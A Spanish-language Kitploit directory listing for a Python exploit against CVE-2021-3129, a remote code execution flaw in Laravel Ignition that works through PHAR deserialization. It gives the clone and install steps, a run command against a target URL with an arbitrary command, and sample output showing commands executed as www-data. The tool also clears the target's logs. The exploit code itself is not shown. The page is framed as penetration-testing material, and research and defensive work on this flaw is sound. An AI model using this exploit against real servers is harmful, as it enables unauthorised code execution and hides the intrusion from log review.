Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-3129 — Exploit en Python para CVE-2021-3129 que automatiza la deserialización PHAR para ejecutar comandos arbitrarios en endpoints vulnerables de Laravel Ignition. | Kitploit
Herramientas/GitHubGitHub/0x0d3ad/cve-2021-3129
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHub0x0d3ad/cve-2021-3129

CVE-2021-3129

Exploit en Python para CVE-2021-3129 que automatiza la deserialización PHAR para ejecutar comandos arbitrarios en endpoints vulnerables de Laravel Ignition.

Ver Repositorio
101hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-3129 Exploit RCE de Laravel Ignition

Este es un script de exploit en Python para CVE-2021-3129, una vulnerabilidad de ejecución remota de código en Laravel cuando el paquete Ignition está instalado. Esta vulnerabilidad permite a un atacante ejecutar comandos arbitrarios del sistema a través de la deserialización PHAR.

Características

  • Genera automáticamente la carga útil PHAR usando phpggc
  • Acepta entrada del usuario para cualquier comando a ejecutar (p.ej., id, whoami, etc.)
  • Automatiza todo el proceso de explotación, incluyendo limpiar registros, inyectar la carga útil, convertir registros a PHAR y desencadenar la deserialización

Requisitos previos

  • Python 3.x
  • Biblioteca requests
  • PHP instalado en su sistema
  • phpggc instalado (para generar cargas útiles PHAR)

Instalación

  1. Clona el repositorio:

    root@kitploit:~
    git clone https://github.com/0x0d3ad/CVE-2021-3129.git
    cd CVE-2021-3129
    
  2. Instala los paquetes Python requeridos:

    root@kitploit:~
    pip install requests
    
  3. Ejecuta el script con el objetivo y el comando deseados:

    root@kitploit:~
    python3 CVE-2021-3129.py http://example.com --cmd 'id'
    

    Ejemplo de salida:

    root@kitploit:~
    [+] Generating PHAR payload for command: id
    [+] Trying to clear logs
    [+] Logs cleared
    [+] Convert log file to PHAR
    [+] Successfully converted logs to PHAR
    [+] PHAR deserialized
    ---------------------------------------
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    ---------------------------------------
    [+] Trying to clear logs
    [+] Logs cleared
    

Argumentos

  • target (obligatorio): La URL de la aplicación Laravel vulnerable.
  • --cmd (opcional): El comando a ejecutar en el objetivo (por defecto: whoami).
  • --log_path (opcional): La ruta del archivo de registro a utilizar (por defecto: ../storage/logs/laravel.log).

POC

POC

POC

Descargar herramienta